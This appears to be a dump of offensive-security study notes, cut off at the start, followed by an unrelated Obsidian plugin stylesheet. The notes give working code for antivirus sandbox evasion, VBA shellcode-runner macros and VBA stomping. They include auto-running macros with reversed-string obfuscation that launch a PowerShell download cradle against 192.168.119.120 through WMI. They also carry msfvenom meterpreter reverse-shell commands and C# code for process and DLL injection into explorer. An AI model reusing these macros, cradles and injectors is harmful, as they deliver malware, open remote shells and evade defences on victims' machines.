| [DllImport("kernel32.dll")] 147 | static extern void Sleep(uint dwMilliseconds); 148 | 149 | static void Main(string[] args) 150 | { 151 | DateTime t1 = DateTime.Now; 152 | Sleep(5000); 153 | double t2 = DateTime.Now.Subtract(t1).TotalSeconds; 154 | if(t2 < 5) 155 | { 156 | return; 157 | } 158 | } 159 | ... 160 | 161 | Explanation : 162 | 163 | - We first use the P/Invoke command to import the API 164 | - We fetch the current time and store it in variable t1 165 | - We then call the _Sleep_ API with 5000 ms (5 sec) as it's argument 166 | - We then get the current time again and subtract it from t1 and store the result in t2 167 | - If t2 is lesser than 5 seconds, then do nothing and exit out from the program. 168 | - In heurestic based scanning, if the AV just skips over sleep statements. Then this is a good way to prevent that from happening. 169 | 170 | > Sleep timers aren't as effective as they used to be. It's a plus point to integrate this into the program but effectiveness cannot be gauranteed. 171 | 172 | > RESOURCES 173 | > 174 | > - https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-sleep 175 | > - https://docs.microsoft.com/en-us/dotnet/api/system.datetime?view=netframework-4.8 176 | 177 |   178 | 179 | ## Non-Emulated APIs 180 | 181 | AV Emulators stimulate the most common APIs, they however cannot process or execute non-emulated APIs and hence crash. 182 | A simple example is the _VirtualAllocExNuma_ (Numa suffix which specifies core optimizations for multi core processors), we can use this instead of _VirtualAllocEx_ . 183 | 184 | Function prototype of **_VirtualAllocEx_** : 185 | 186 | LPVOID VirtualAllocEx( 187 | HANDLE hProcess, 188 | LPVOID lpAddress, 189 | SIZE_T dwSize, 190 | DWORD flAllocationType, 191 | DWORD flProtect 192 | ); 193 | 194 | Function prototype of **_VirtualAllocExNuma_** : 195 | 196 | LPVOID VirtualAllocExNuma( 197 | HANDLE hProcess, 198 | LPVOID lpAddress, 199 | SIZE_T dwSize, 200 | DWORD flAllocationType, 201 | DWORD flProtect, 202 | DWORD nndPreferred 203 | ); 204 | 205 | The only difference is the extra argument _nndPreferred_ in _VirtualAllocExNuma_ which specifies where the physical memory should reside. We can set this options to "0" to use the first node. 206 | 207 | P/Invoke statement : 208 | 209 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 210 | static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred); 211 | 212 |   213 | 214 | Code to check for AV Sandbox : 215 | 216 | ... 217 | [DllImport("kernel32.dll")] 218 | static extern IntPtr GetCurrentProcess(); 219 | 220 | IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0); 221 | if(mem == null) 222 | { 223 | return; 224 | } 225 | ... 226 | 227 | Explanation : 228 | 229 | - We first import the Win32 API for _VirtualAllocExNuma_ and the _GetCurrentProcess_ 230 | - We then start allocating the memory using the API 231 | - If an AV is running the code in sandbox, then the API would not be executed and the value of the variable mem will be null. 232 | - In this case the program would stop execution 233 | 234 |   235 | 236 | > RESOURCES 237 | > 238 | > - https://docs.microsoft.com/en-gb/windows/win32/procthread/numa-support 239 | > - https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocexnuma 240 | > - https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getcurrentprocess 241 | 242 |   243 | 244 | # AV Bypass with Office 245 | 246 | ## AV Bypass with VBA 247 | 248 | A simple Shellcode Runner macro can be found [here](./VBA%20Scripts/ShellcodeRunner.vba) 249 | 250 | Explanation : 251 | 252 | - We first import the necessary Win32 APIs 253 | - We store the shellcode buffer in a variable and then allocate a buffer space in the memory with the help of _VirtualAlloc_ 254 | - Next we copy byte by byte of our shellcode to the allocated buffer and then execute it 255 | - The Document_Open and AutoOpen executes the macro as soon as the document is opened without user intervention. 256 | 257 | For encrypting this shellcode, we will use the same Caesar Cipher encryption routine. The program to encrypt the shellcode can be found [here](./C%23%20Programs/vba_encrypt.cs) 258 | 259 | Explanation : 260 | 261 | - We first take in the shellcode and create variable array with the same length 262 | - We then do a shift of 2 for each byte and do and AND with 0xFF, this is to prevent the byte from going over it's limit. 263 | - The next for loop converts the bytes into decimals after which it prints out the payload. 264 | 265 | We can also add sleep commands in our vba script to bypass time-lapse detection implemented by AV. 266 | 267 | Code Snippet : 268 | 269 | Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long 270 | ... 271 | Dim t1 As Date 272 | Dim t2 As Date 273 | Dim time As Long 274 | 275 | t1 = Now() 276 | Sleep (2000) 277 | t2 = Now() 278 | time = DateDiff("s", t1, t2) 279 | 280 | If time < 2 Then 281 | Exit Function 282 | End If 283 | ... 284 | 285 | Explanation : 286 | 287 | - We first fetch the current time and then do a sleep for 2 sec 288 | - If the AV skips this command , then we can do a simple check to see if this was executed. If it is not, then we can be sure that we are in a sandbox and not run the rest of the program and exit out. 289 | 290 | > RESOURCES 291 | > 292 | > - https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/now-function 293 | > - https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/datediff-function 294 | > - https://www.c-sharpcorner.com/article/caesar-cipher-in-c-sharp/ 295 | 296 |   297 | 298 | ## VBA Stomping 299 | 300 | We can use [FlexHex](http://www.flexhex.com/) to unwrap a .doc file. This would help us to look into the structure, files and metadata. 301 | 302 | Newer word and Excel documents using the modern macro-enabled formats can be unzipped with 7zip. 303 | 304 | **P-code** is a compiled version of the textual VBA code for a specific version of Microsoft Office and VBA it was created on. 305 | 306 | This means that if we remove the textual vba code and leave the P-code as it is, then even if the vba code is not present, if the file is opened on the same Microsoft office version, then our compiled code would run and give us a shell. 307 | 308 | The version for which the P-code is made can be found in the \_VBA_Project file when opened in FlexHex. 309 | 310 | In the hex editor we can select from Attribute VB_Name to the end and replace them with null bytes. Thsi would essentially remove out our VBA code but the compiled P-code would still remain. 311 | 312 | AV would see that the vba is empty and not flag it. When opened on a particular version of Microsoft Office, the P-code would be executed and we would get our shell, additionally Office would also decompile our P-code and write back the vba code from the P-code. 313 | 314 | This is known as Vba Stomping where we remove out the textual vba code and leave out the compiled P-code. 315 | 316 |   317 | 318 | > RESOURCES 319 | > 320 | > - https://github.com/clr2of8/Presentations/blob/master/DerbyCon2018-VBAstomp-Final-WalmartRedact.pdf 321 | > - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cfb/53989ce4-7b05-4f8d-829b-d08d6148375b 322 | > - https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239 323 | > - https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/c66b58a6-f8ba-4141-9382-0612abce9926 324 | 325 |   326 | 327 | ## Powershell in VBA 328 | 329 | Code snippet : 330 | 331 | Sub MyMacro() 332 | Dim strArg As String 333 | strArg = "powershell -exec bypass -nop -c iex((new-object system.net.webclient).downloadstring('http://192.168.119.120/run.txt'))" 334 | Shell strArg, vbHide 335 | End Sub 336 | 337 | Explanation : 338 | 339 | - We first declare the variable to store our powershell command. 340 | - We then execute it using the _Shell_ command and the variable as the aurgument followed by the vbHide to hide the command prompt. 341 | 342 | Problems : 343 | 344 | - Even though this is only the download cradle for our main shellcode, it would get detected by the AV due to the powershell getting spawned a child process of Office. 345 | - We can bypass this with the help of WMI (Windows Management Instrumentation) 346 | 347 |   348 | 349 | ## Dechaining with WMI 350 | 351 | WMI is an old native part of the Windows Operating System and is not well documented. We can use the Win32_Process to create a seperate process of the powershell. 352 | 353 | Code : 354 | 355 | Sub MyMacro 356 | strArg = "powershell -exec bypass -nop -c iex((new-object system.net.webclient).downloadstring('http://192.168.119.120/run.txt'))" 357 | GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid 358 | End Sub 359 | 360 | Sub AutoOpen() 361 | Mymacro 362 | End Sub 363 | 364 | Explanation : 365 | 366 | - The strArg variable stores the powershell command for the download cradle. 367 | - We then invoke wmi to create a seperate process of powershell and then execute the command in it. 368 | - This would first off create a new process and heurestic based scans which are scanning Office would not flag it. 369 | - The AutoOpen function is to execute macro as soon as the document is opened. 370 | 371 |   372 | 373 | ## Obfuscating VBA 374 | 375 | We can now move on the obfuscate vba so that is not picked up by AV. 376 | 377 | ### String Reverse 378 | 379 | Code : 380 | 381 | Sub Mymacro() 382 | Dim strArg As String 383 | strArg = StrReverse("))'txt.nur/021.911.861.291//:ptth'(gnirtsdaolnwod.)tneilcbew.ten.metsys tcejbo-wen((xei c- pon- ssapyb cexe- llehsrewop") 384 | GetObject(StrReverse(":stmgmniw")).Get(StrReverse("ssecorP_23niW")).Create strArg, Null, Null, pid 385 | End Sub 386 | 387 | Explanation : 388 | 389 | - The whole string is stored in reverse. 390 | - Using the wmi provider StrReverse, we can reverse the reversed string and then execute it. 391 | 392 | Other than these, we can also use random variables and text character based arrays with interconversion between them to make static analysis harder. 393 | 394 |   395 | 396 | > RESOURCES 397 | > 398 | > - https://en.wikipedia.org/wiki/Obfuscation_(software 399 | > - https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/strreverse-function 400 | > - https://codebeautify.org/reverse-string 401 | -------------------------------------------------------------------------------- /Process Injection and Migration/README.md: -------------------------------------------------------------------------------- 1 | # Process Injection 2 | 3 | ## Process Injection Theory 4 | 5 | Process : A Container that is created to house a running application. Each Windows Process maintains it's own virtual space, interaction between these spaces can take place with the help of Win32 APIs 6 | 7 | Thread : Executes the compiled assembly code of an application. A process can have multiple threads, each thread has its own stack and shares the memory of the process. 8 | 9 | Win32 APIs : _OpenProcess_ , _VirtualAllocEx_ , _WriteProcessMemory_ and _CreateRemoteThread_. 10 | 11 | > All Processes have **Integrity level**. Higher integrity level process can interact with lower integrity process, but the reverse is not possible. This is done to prevent privilege escalation. 12 | 13 | > We can check the integrity levels : Right click on exe > Properties > Security 14 | 15 |   16 | 17 | ## Process Injection in C# 18 | 19 | We'll be using 4 Win32 APIs from Kernel32.dll - 20 | 21 | - _OpenProcess_ : To open a channel from one process to another. 22 | - _VirtualAllocEx_ : To modify it's memory space and create a memory space for our shellcode. 23 | - _WriteProcessMemory_ : Write the shellcode to the created memory space. 24 | - _CreateRemoteThread_ : To execute the shellcode in a new thread in the memory space. 25 | 26 |   27 | 28 | Understanding each Function in-depth : 29 | 30 | **_OpenProcess_** 31 | 32 | Function : 33 | 34 | HANDLE OpenProcess( 35 | DWORD dwDesiredAccess, 36 | BOOL bInheritHandle, 37 | DWORD dwProcessId 38 | ); 39 | 40 | Explanation : 41 | 42 | - The first argument _dwDesiredAccess_ is the access right we want to obtain, it's value will be cross checked with the security descriptor. 43 | - The second argument _bInheritHandle_ tells if the child process can inherit this handle. If it's value is **TRUE**, processes created by this process will iherit this handle. 44 | - The third argument _dwProcessId_ is the Process ID of the process in which we want to inject our shellcode. 45 | 46 | > Documentation : 47 | > 48 | > - https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess 49 | > - https://docs.microsoft.com/en-gb/windows/win32/procthread/process-security-and-access-rights 50 | 51 |   52 | 53 | **_VirtualAllocEx_** 54 | 55 | Function : 56 | 57 | LPVOID VirtualAllocEx( 58 | HANDLE hProcess, 59 | LPVOID lpAddress, 60 | SIZE_T dwSize, 61 | DWORD flAllocationType, 62 | DWORD flProtect 63 | ); 64 | 65 | Explanation : 66 | 67 | - The first argument _hProcess_ is the process handle of the process. 68 | - The second argument _lpAddress_ is the desired starting address in the allocated space. 69 | - The third argument _dwSize_ sets the size of the allocated size. 70 | - The dwSize contains the size of the buffer, in our case it is the size of our shellcode. 71 | - The flAllocationType has the type of memory allocation(Types: MEM_COMMIT, MEM_RESERVE, MEM_RESET, MEM_RESET_UNDO) 72 | - The flProtect has the memory Protections for the allocated memory 73 | 74 | > Documentation : 75 | > 76 | > - https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex 77 | > - https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants 78 | 79 |   80 | 81 | **_WriteProcessMemory_** 82 | 83 | Function : 84 | 85 | BOOL WriteProcessMemory( 86 | HANDLE hProcess, 87 | LPVOID lpBaseAddress, 88 | LPCVOID lpBuffer, 89 | SIZE_T nSize, 90 | SIZE_T *lpNumberOfBytesWritten 91 | ); 92 | 93 | Explanation : 94 | 95 | - The first argument _hProcess_ is the process handle of the victim process. 96 | - The second argument _lpBaseAddress_ is the address of the allocated memory address. 97 | - The third argument _lpBuffer_ is the buffer of the shellcode. 98 | - The fourth argument _nSize_ is the size of the buffer. 99 | - The fifth argument _\*lpNumberOfBytesWritten_ is the pointer to a variable that recieves the number of bytes transferred. If set to NULL, the parameter is ignored. 100 | 101 | > Documentation : 102 | > 103 | > - https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory 104 | 105 |   106 | 107 | **_CreateRemoteThread_** 108 | 109 | Function : 110 | 111 | HANDLE CreateRemoteThread( 112 | HANDLE hProcess, 113 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 114 | SIZE_T dwStackSize, 115 | LPTHREAD_START_ROUTINE lpStartAddress, 116 | LPVOID lpParameter, 117 | DWORD dwCreationFlags, 118 | LPDWORD lpThreadId 119 | ); 120 | 121 | Explanation : 122 | 123 | - The first argument _hProcess_ is the process handle of the victim process. 124 | - The second argument _lpThreadAttributes_ is the desired security attributes 125 | - The third argument is the initial size of the stack, we can set it to 0 to use the default values. 126 | - The fourth argument _lpStartAddress_ is the starting address of the thread (address of the allocated buffer). 127 | - The fifth argument _lpParameter_ is the pointer to a variable to be passed to the thread function. 128 | - The sixth argument _dwCreationFlags_ controls the creation of the thread. It can have three values : 0, CREATE_SUSPENDED and STACK_SIZE_PARAM_IS_A_RESERVATION . 129 | - The seventh argument _lpThreadId_ is a pointer to a variable that receives the thread identifier. If this parameter is NULL, the thread identifier is not returned. 130 | 131 | > Documentation : 132 | > 133 | > - https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread 134 | 135 |   136 | 137 | MSFVENOM COMMAND : 138 | 139 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f csharp EXITFUNC=thread 140 | 141 |   142 | 143 | Final Code : 144 | 145 | using System; 146 | using System.Runtime.InteropServices; 147 | namespace Inject 148 | { 149 | class Program 150 | { 151 | 152 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 153 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 154 | 155 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 156 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 157 | 158 | [DllImport("kernel32.dll")] 159 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 160 | 161 | [DllImport("kernel32.dll")] 162 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 163 | 164 | static void Main(string[] args) 165 | { 166 | 167 | IntPtr hProcess = OpenProcess(0x001F0FFF, false, 4804); 168 | IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40); 169 | byte[] buf = new byte[591] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x0a,0x41,0x89,0xda,0xff,0xd5 }; 170 | IntPtr outSize; 171 | WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize); 172 | IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 173 | } 174 | } 175 | } 176 | 177 |   178 | 179 | Explanation : 180 | 181 | - We first import the System and the interop classes to interact with the APIs and other functions. 182 | - Next we specify the namespace followed by the class inside it. 183 | - The following statements are DllImports which import the Win32 APIs from Kernel32. These can be obtained from [pinvoke](https://pinvoke.net) 184 | - Next is the Main function inside which we write our code. 185 | - We open a channel to a new process using the _OpenProcess_ API, the first argument specifies the PROCESS_ALL_ACCESS in hexadecimal, the second argument specifies if child processes can inherit this handle. The third argument specifies the process ID of the victim process. We store this in the hProcess variable. 186 | - Now we allocate the space in the process using the _VirtualAllocEx_. The first argument specifies the process handle, the second argument is set to zero so that the API can select an unused address. The third, fourth and fifth arguments are the size, type of allocation and protections of the allocated memory. 0x1000 specifies a size of 1000 bytes, 0x3000 specifies MEM_COMMIT and MEM_RESERVE and 0x40 specifies read,write and execute of the allocated space. 187 | - We then specify the buf variable which stores the shellcode generated by msfvenom. 188 | - The _WriteProcessMemory_ takes 5 arguments. 189 | - The first argument specifies the process handle. 190 | - The second argument is the address of the allocated space 191 | - The third argument is the shellcode buffer. 192 | - The fourth argument is the size of the shellcode buffer. 193 | - The fifth argument is a pointer to a location in memory to output how much data was copied. The datatype is **out** because we want an address pointer and this should also align with the function prototype. 194 | - In the _CreateRemoteThread_, except the first and the fourth argument, the rest are NULL so that the API considers default values. 195 | - The first argument specifies the process handle created. 196 | - The fourth handle specifies the address to the allocated memory. 197 | 198 | > Documentation : 199 | > 200 | > - https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/keywords/out-parameter-modifier 201 | 202 |   203 | 204 | # DLL Injection 205 | 206 | ## DLL Injection Theory 207 | 208 | - To use an API from a DLL, we have to use the LoadLibrary API to load the dll onto the virtual memory space. 209 | - The LoadLibraryA module takes in only only argument which is the name of the dll. 210 | - Function prototype of LoadLibraryA : 211 | 212 | HMODULE LoadLibraryA( 213 | LPCSTR lpLibFileName 214 | ); 215 | 216 | - LoadLibrary caannot be invoked on remote processes, but our workaround to this problem is that we'll resolve it's address using the _GetProcAddress_ and _GetModuleHandle_. Since the native windows DLLs are allocated same base address across processes, so the address of LoadLibraryA would be same for our current and remote process. 217 | - We can then pass this address along with the allocated dll as the argument 218 | 219 |   220 | 221 | ## DLL Injection in C# 222 | 223 | MSFVENOM Payload : 224 | 225 | sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT= -f dll -o shell.dll 226 | 227 | Final Code : 228 | 229 | using System; 230 | using System.Diagnostics; 231 | using System.Net; 232 | using System.Runtime.InteropServices; 233 | using System.Text; 234 | 235 | namespace Inject 236 | { 237 | class Program 238 | { 239 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 240 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 241 | 242 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 243 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 244 | 245 | [DllImport("kernel32.dll")] 246 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 247 | 248 | [DllImport("kernel32.dll")] 249 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 250 | 251 | [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] 252 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 253 | 254 | [DllImport("kernel32.dll", CharSet = CharSet.Auto)] 255 | public static extern IntPtr GetModuleHandle(string lpModuleName); 256 | 257 | static void Main(string[] args) 258 | { 259 | String dir = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); 260 | String dllName = dir + "\\shell.dll"; 261 | WebClient wc = new WebClient(); 262 | wc.DownloadFile("", dllName); 263 | Process[] expProc = Process.GetProcessesByName("explorer"); 264 | int pid = expProc[0].Id; 265 | IntPtr hProcess = OpenProcess(0x001F0FFF, false, pid); 266 | IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40); 267 | IntPtr outSize; 268 | Boolean res = WriteProcessMemory(hProcess, addr, Encoding.Default.GetBytes(dllName), dllName.Length, out outSize); 269 | IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); 270 | IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr, 0, IntPtr.Zero); 271 | } 272 | } 273 | } 274 | 275 |   276 | 277 | Explanation : 278 | 279 | - We first import the System and interop namespaces to interact with the win32 APIs and System classes 280 | - We then define a namespace called Inject followed by a class called Program inside this namespace. 281 | - This is follwed by the Pinvoke statements to load the required Win32 APIs 282 | - We then specify the Main method inside which our code is written. 283 | - We get the Full system path of Document folder and store it in the dir variable. 284 | - We then store the name of the dll with its complete path in dllName 285 | - Next is to download the hosted DLL and save it to this file 286 | - To get the process ID of explorer, we use the GetProcessByName and then extract it's ID from that. 287 | - We then open a new process to explorer using _OpenProcess_ 288 | - Using _VirtualAllocEx_ we can allocate a space in this remote process. 289 | - We write the dll into this handle using the _WriteProcessMemory_ API. We encode the dll before writing it in. 290 | - Using _GetProcAddress_ and _GetModuleHandle_ we can get the address of the LoadLibraryA. 291 | - We then create a remote thread, but this time we pass the address of the LoadLibraryA and the dll as it's argument. This way we can execute a dll in a remote process. 292 | 293 |   294 | 295 | > Documentation : 296 | > 297 | > - https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya 298 | > - https://codingvision.net/c-inject-a-dll-into-a-process-w-createremotethread 299 | 300 |   301 | 302 | # Reflective DLL Injection 303 | 304 | - In DLL injection, the DLL is loaded from the disk to the remote process. Writing DLL to the disk can trigger AV and can compromise out attack. 305 | - A workaround to this problem would be to implement Reflective DLL injection. The DLL is injected to the victim process directly from memory rather than from disk. 306 | - This basically maps the DLL's Portable Executable format content into the memory. 307 | - We can use a powershell module to implement the functionality of the LoadLibrary but avoid writing to the disk and also bypass detection by process explorer and AV. 308 | - For this we can use the _Invoke-ReflectPEInjection_ to parse the contents of the PE file and perform reflection to avoid writing to the disk. 309 | - This tool has two functionalities: reflectively load PE or EXE to same process or reflective load DLL onto remote process. 310 | 311 | Import the powershell module : 312 | 313 | Import-Module Invoke-ReflectivePEInjection.ps1 314 | 315 | Powershell Code to perform Reflective DLL Injection 316 | 317 | $bytes = (New-Object System.Net.WebClient).DownloadData('') 318 | $procid = (Get-Process -Name explorer).Id 319 | 320 | Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid 321 | 322 |   323 | 324 | > Documentation : 325 | > 326 | > - https://github.com/stephenfewer/ReflectiveDLLInjection 327 | > - https://docs.microsoft.com/en-us/windows/win32/debug/pe-format 328 | > - https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1 329 | > - https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection 330 | 331 |   332 | 333 | # Process Hollowing 334 | 335 | - The issue in the above method of process injection is that we may still be detected as we generate network traffic from programs such as explorer and notepad. 336 | - We can migrate to svchost to mask our identity as it generates network activity. 337 | - The problem here is svchost runs by default at SYSTEM integrity level, we cannot inject into such processes. 338 | - We can solve this problem by using a method called **Process Hollowing**, in which we start the processes as suspended and then modify it before it starts execution. 339 | 340 | ## Theory 341 | 342 | - During the creation of a process using _CreateProcess_ API, we can set the CREATE_SUSPENDED to create a new suspended process. 343 | - When a process is created using _CreateProcess_ , the OS does a few things :- 344 | - Creates virtual memory space for the process 345 | - Allocates stack along with Thread Environment Block(TEB) and Process Environment Block(PEB) 346 | - Loads the required EXE and DLL to the memory 347 | - Once the above tasks are done, the OS will create a thread to execute the code. If we suppply the CREATE_SUSPENDED flag, then the execution will stop just before it runs the first instruction. 348 | - Now to locate the entrypoint of the executable, we can use the _ZwQueryInformationProcess_ API to retrive the PEB. 349 | - From the PEB, we can obtain the base address of the process and use this to parse the PE Headers and locate the entrypoint. 350 | - We can find the base address at an offset of 0x10 into the PEB 351 | - After the _ZwQueryInformationProcess_ yields the address of the PEB, we can use the _ReadProcessMemory_ API to read the contents of the PEB at offset 0x10 352 | - First we read the e_lfanew field at offset 0x3C, this contains the offset from the beginning of the PE file to the PE Header. 353 | - We then read the Relative Virtual Address (RVA) of the Entrypoint at offset 0x28 from the PE Header, this needs to be added to the base address of the remote process to obtain the absolute memory address. 354 | - Once we have the entrypoint of the remote process, we can use the WriteProcessMemory to overwrite the original contents of the executable. 355 | - We can then resume the execution of the thread. 356 | 357 | > All PE Files follow a standard format, this helps us to predict where to find the required offsets. 358 | 359 | > Documentation : 360 | > 361 | > - https://en.wikipedia.org/wiki/Win32_Thread_Information_Block 362 | > - https://en.wikipedia.org/wiki/Process_Environment_Block 363 | > - https://en.wikipedia.org/wiki/Address_space_layout_randomization 364 | > - https://docs.microsoft.com/en-us/windows/win32/procthread/zwqueryinformationprocess 365 | > - https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-readprocessmemory 366 | > - https://gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 367 | > - https://github.com/sbridgens/ProcessHollowing 368 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-image-toolkit/styles.css: -------------------------------------------------------------------------------- 1 | body { 2 | --layer-image-toolkit-popup: 1024; 3 | --layer-image-toolkit-player: 1025; 4 | --layer-image-toolkit-notice: 1026; 5 | --layer-menu: 1027; 6 | } 7 | 8 | .menu { 9 | z-index: var(--layer-menu); 10 | } 11 | 12 | .notice-container { 13 | z-index: var(--layer-image-toolkit-notice); 14 | } 15 | 16 | .oit-main-container-view li::before { 17 | margin-left: 0; 18 | } 19 | 20 | .image-toolkit-img-invert { 21 | filter: invert(1) hue-rotate(180deg); 22 | mix-blend-mode: screen; 23 | } 24 | 25 | .oit-main-container-view { 26 | position: fixed; 27 | font-size: 0; 28 | line-height: 0; 29 | top: 0; 30 | bottom: 0; 31 | left: 0; 32 | right: 0; 33 | background: rgba(0, 0, 0, .6); 34 | z-index: var(--layer-image-toolkit-popup); 35 | display: none; 36 | } 37 | 38 | .oit-pin-container-view { 39 | position: fixed; 40 | font-size: 0; 41 | line-height: 0; 42 | z-index: var(--layer-image-toolkit-popup); 43 | display: none; 44 | } 45 | 46 | .oit-main-container-view .img-container, 47 | .oit-pin-container-view .img-container { 48 | position: absolute; 49 | top: 0; 50 | pointer-events: none; 51 | } 52 | 53 | .oit-main-container-view .img-container .img-view { 54 | max-height: none; 55 | pointer-events: auto; 56 | } 57 | 58 | .oit-pin-container-view .img-container .img-view { 59 | position: absolute; 60 | max-height: none; 61 | pointer-events: auto; 62 | box-shadow: 0 0 5px; 63 | } 64 | 65 | .oit-pin-container-view .img-container .img-view:hover { 66 | box-shadow: 0 0 6px #55acc6; 67 | } 68 | 69 | .oit-main-container-view .img-default-background, 70 | .oit-pin-container-view .img-default-background { 71 | background-position: 0 0, 5px 5px !important; 72 | background-size: 10px 10px !important; 73 | background-image: linear-gradient(45deg, #eee 25%, transparent 25%, transparent 75%, #eee 75%, #eee 100%), linear-gradient(45deg, #eee 25%, #fff 25%, #fff 75%, #eee 75%, #eee 100%) !important; 74 | } 75 | 76 | .oit-main-container-view .img-container .img-view:hover, 77 | .oit-pin-container-view .img-container .img-view:hover { 78 | cursor: pointer; 79 | } 80 | 81 | .oit-main-container-view .img-close { 82 | position: absolute; 83 | width: 32px; 84 | height: 32px; 85 | top: 0; 86 | right: 0; 87 | cursor: pointer; 88 | } 89 | 90 | .oit-main-container-view .img-tip, 91 | .oit-pin-container-view .img-tip { 92 | position: absolute; 93 | top: 50%; 94 | left: 50%; 95 | font-size: 12px; 96 | line-height: 20px; 97 | height: 20px; 98 | width: 50px; 99 | text-align: center; 100 | color: #fff; 101 | border-radius: 10px; 102 | background-color: rgba(0, 0, 0, .4); 103 | pointer-events: none; 104 | z-index: 1; 105 | } 106 | 107 | .oit-main-container-view .img-player, 108 | .oit-pin-container-view .img-player { 109 | display: none; 110 | position: fixed; 111 | width: 100%; 112 | height: 100%; 113 | left: 0; 114 | top: 0; 115 | cursor: none; 116 | background-color: #000; 117 | text-align: center; 118 | cursor: pointer; 119 | } 120 | 121 | .oit-main-container-view .img-player > img, 122 | .oit-pin-container-view .img-player > img { 123 | display: inline; 124 | float: none; 125 | padding: 0; 126 | max-height: none; 127 | transform: none; 128 | cursor: pointer; 129 | } 130 | 131 | .oit-main-container-view .img-footer { 132 | position: absolute; 133 | text-align: center; 134 | bottom: 5px; 135 | left: 0; 136 | right: 0; 137 | } 138 | 139 | .oit-main-container-view .img-footer .img-title { 140 | font-size: 12px; 141 | line-height: 1; 142 | display: inline-block; 143 | max-width: 90%; 144 | white-space: nowrap; 145 | text-overflow: ellipsis; 146 | margin: 5px; 147 | opacity: .8; 148 | color: #fff; 149 | /* filter: alpha(opacity=80) */ 150 | } 151 | 152 | .oit-main-container-view .img-footer .img-title:hover { 153 | /* opacity: 1; */ 154 | color: #fff; 155 | font-size: 15px; 156 | background-color: rgba(0, 0, 0, .3); 157 | border-radius: 8px; 158 | line-height: 1.5; 159 | /* filter: alpha(opacity=100) */ 160 | } 161 | 162 | .oit-main-container-view .img-footer .img-toolbar { 163 | width: 385px; 164 | height: 30px; 165 | margin: 0 auto 5px; 166 | padding: 3px 0; 167 | } 168 | 169 | .oit-main-container-view .img-footer .img-toolbar:hover { 170 | background-color: rgba(0, 0, 0, .3); 171 | border-radius: 12px; 172 | } 173 | 174 | .oit-main-container-view .img-footer .img-toolbar > li { 175 | float: left; 176 | width: 25px; 177 | height: 25px; 178 | margin: 0 5px; 179 | padding: 0; 180 | 